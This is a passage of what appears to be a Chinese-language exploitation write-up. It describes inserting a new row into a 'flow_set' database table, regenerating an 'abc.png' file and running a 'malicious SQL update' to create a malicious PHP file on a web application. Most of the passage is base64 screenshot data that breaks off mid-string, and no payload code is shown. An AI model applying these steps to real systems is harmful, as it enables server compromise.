<p blockindex=64><img src="data:image/png;base64,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
<p blockindex=65><code>flow_set</code> 表中默认的数据都是存在相应的 <code>PHP</code> 文件的,我们得新插入一条数据进行上述操作才能生成恶意的 php 文件。</p>
<p blockindex=66>我们用之前找到的插入 <code>flow_set</code> 数据的接口进行插入</p>
<p blockindex=67><img src=data:image/png;base64,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
<p blockindex=68>此时数据表为</p>
<p blockindex=69><img src="data:image/png;base64,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
<p blockindex=70>记住这个 id 和 num 的值,我们根据 <code>id</code> 值重新生成 <code>abc.png</code> 的内容,然后进行恶意 sql 更新</p>
<p blockindex=71><img src="data:image/png;base64,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